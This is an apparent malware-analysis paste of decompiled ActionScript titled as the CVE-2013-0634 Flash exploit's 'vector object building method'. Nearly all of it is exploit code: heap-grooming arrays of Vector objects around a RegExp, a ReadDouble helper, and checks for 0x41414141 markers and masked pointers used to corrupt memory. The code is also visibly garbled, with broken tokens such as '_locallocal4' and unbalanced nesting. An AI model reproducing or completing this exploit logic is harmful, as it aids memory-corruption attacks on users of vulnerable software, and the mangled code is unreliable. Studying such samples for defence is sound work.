CVE-2013-0634 Exploit Vector Object building method..

1. // CVE-2013-0634 Exploit Vector Object building method..
2.  
3. // The flood is formed by using var_local24 and _local4
4. // to be end up in the formation of _local3
5. // To the usage of the vector object as exploitation method..
6.  
7. "initiation"
8. var _local24: string;
9. var _local3: uint;
10. var _local4: ByteArray = new ByteArray();
11. var _local5: Vector. < Object > = new < Object > [];
12.  
13.  
14. "filling randomize character"
15. _local24 = "";
16. _local3 = 0;
17. while (_local3 < 42) {
18. _local24 = (_local24 + string.fromcharcode(this.randRange(97, 122)));
19. _local3++;
20. };
21.  
22. // preparing the vector object, exploitation method..
23.  
24. _local5[_local1] = new < Object > [new RegExp(_local24, ""), new < Number >
25. [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0,
26. 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0, 0, 0, 0,
27. 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0, 0, 0, 0, 0, 0,
28. 0 , 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
29. 0, 0, 0, 0, new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
30. , 1], new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
31. new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new <
32. Object > [null, _local6, _local4, _local4, _local4, _local4, _local4,
33. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
34. _local4, _local4, _local4, _local4, _local4, _locallocal4, _local4,
35. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
36. _local4], new < Object > [null, _local6, _local4, _local4, _local4,
37. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
38. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
39. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
40. _local4, _local4, _loca new < Object > [null, _local6, _local4, _local4,
41. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
42. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4
43. , _local4, _local4, _local4, _local4, _local4, _local4, _local4, _loca
44. l4, _local4, _local4, _local4, _local4], new < Object > [null, _local6
45. , _local4, _local4, _local4, _local4, _local4, _local4, _local4,cal4,
46. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4
47. , _local4, _local4, _local4, _local4, _local4, _local4, _local4, _loca
48. l4, _local4, _local4, _local4, _local4, _local4, _local4], new < Objec
49. t > [null, _local6, _local4, _local4, _local4, _local4, _local4, _loca
50. l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _lo
51. cal4, _local4, _local4, _local4, _local4ocal4, _local4, _local4, _loca
52. l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _lo
53. cal4], new < Object > [null, _local6, _local4, _local4, _local4, _loca
54. l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _lo
55. cal4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _
56. local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
57. _local4, _locallocal4], new < Object > [null, _local6, _local4, _loca
58. l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _l
59. ocal4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
60. _local4, _local4, _local4, _local4, _local4, _local4, _local4, _loca
61. l4, _local4, _local4, _local4, _local4, _local4]];
62.  
63.  
64. // Link between _local4 and _local5 is in here...the ReadDouble() function..
65.  
66. function ReadDouble(_arg1: Vector. < Number > , _arg2: uint): Vector. < uint >
67. { var _local3: Vector. < uint > = new < uint > [0, 0];
68. var _local4: number = _arg1[_arg2];
69. var _local5: ByteArray = new ByteArray();
70. _local5.position = 0;
71. _local5.writeDouble(_local4);
72. _local3[1] = ((((_local5[0] * 16777216) +
73. (_local5[1] * 65536)) + (_local5[2] * 0x0100)) + _local5[3]);
74. _local3[0] = ((((_local5[4] * 16777216) + (_local5[5] * 65536)) +
75. (_local5[6] * 0x0100)) + _local5[7]);
76. return (_local3);
77. }
78.  
79. // to be called in many places...noted to keep the vector object forms..
80.  
81. if (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[0] == 16) {
82. _local9 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[1];
83. if (this.ReadDouble((_local5[_local1][_local8] as Vector. < Number > ), 0)[0] == 0x41414141) {
84. if ((((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local1)[1] == 32)) && ((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 1))[0] == 1)))) {
85. _local11 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 1))[1] & 0xFFFFFFF8);
86. _local12 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 2))[0] & 0xFFFFFFF8);
87. _local29 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((17 * _local1) + (_local1 - 1)));
88. _local30 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((17 * (_local1 + 1)) + _local1));
89. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
90. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
91. _local16 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
92. _local26 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
93. _local26 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[1];
94. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
95. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
96. (_local5[_local7][_local22] as Vector. < Number > )[_local15] = this.UintToDouble(_local12, this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[1]);
97. (_local5[_local7][_local22] as Vector. < Number > )[_local15] = this.UintToDouble(_local16, this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[1]);
98. if (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 16)[0] == 16) {
99. _local31 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[1];
100. _local9 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[0];
101. if (this.ReadDouble((_local5[_local1][_local8] as Vector. < Number > ), 0)[0] == 0x41414141) {
102. if ((((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local1)[0] == 32)) && ((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 1))[0] == 1)))) {
103. _local11 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 2))[0] & 0xFFFFFFF8);
104. _local12 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 3))[0] & 0xFFFFFFF8);
105. if (((!((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 2))[1] == _local31))) || (!((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 3))[1] == _local31))))) {
106. _local29 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((16 * _local1) + (2 * (_local1 - 1))));
107. _local30 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((16 * (_local1 + 1)) + (2 * ((_local1 + 1) - 1))));
108. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
109. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
110. _local16 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
111. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
112. _local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
113.  
114.  
115. #MalwareMustDie!